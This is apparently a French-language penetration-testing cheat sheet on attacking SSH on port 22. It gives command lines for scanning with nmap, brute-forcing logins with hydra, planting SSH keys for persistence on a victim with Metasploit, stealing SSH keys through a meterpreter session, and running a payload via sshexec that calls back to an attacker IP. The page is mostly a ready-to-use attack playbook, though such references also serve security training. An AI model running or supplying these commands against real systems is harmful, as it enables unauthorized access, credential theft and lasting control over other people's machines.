🔐SSH - port 22

Mindmap

Scan

$ nmap -sV -p22 <target IP>

Connexion

$ ssh <username>@<host IP>

Ou avec PuTTY

ressource: https://www.putty.org/

Bruteforce

$ hydra -L user.txt -P pass.txt <target IP> ssh

Port Redirection

$ nano /etc/ssh/sshd_config

Une fois dans le fichier, changez simplement le Port 22 par Port 2222 par exemple.

Persistance

Avec Metasploit:

msf6 > use post/linux/manage/sshkey_persistence
msf6 post(sshkey_persistence) > set session X
msf6 post(sshkey_persistence) > exploit

Cela aura pour effet d'ajouter une clé SSH à un utilisateur spécifié (ou à tous), pour permettre la connexion à distance sur la victime via SSH à tout moment.

On va donc récupérer la clé générée qu'on va par exemple appeler key.txt puis donner au fichier les droits nécessaires (600).

Une fois cela fait on peut donc se connecter en ssh à la cible avec celle-ci.

chmod 600 key.txt
ssh -i key.txt <username>@<target IP>

Vol de clé SSH

Nécessite une session meterpreter.

msf6 > use post/multi/gather/ssh_creds
msf post(multi/gather/ssh_creds) > set session X
msf post(multi/gather/ssh_creds) > exploit

Ce module va télécharger les clés SSH que nous pourront ensuite utiliser pour nous connecter de la même manière de précédemment.

chmod 600 key.txt
ssh -i key.txt <username>@<target IP>

Execution du code utilisateur SSH

Ce module se connecte au système cible et exécute les commandes nécessaires pour exécuter la charge utile spécifiée via SSH. Si une charge utile native est spécifiée, un intermédiaire approprié sera utilisé. Si tout se passe bien, nous obtenons une session meterpreter sur notre machine d'écoute.

msf6 > use exploit/multi/ssh/sshexec 
msf6 exploit(multi/ssh/sshexec) > set rhosts <host IP> 
msf6 exploit(multi/ssh/sshexec) > set username <username> 
msf6 exploit(multi/ssh/sshexec) > set password <password>
msf6 exploit(multi/ssh/sshexec) > set srvhost <attacker IP> 
msf6 exploit(multi/ssh/sshexec) > exploit

Dernière mise à jour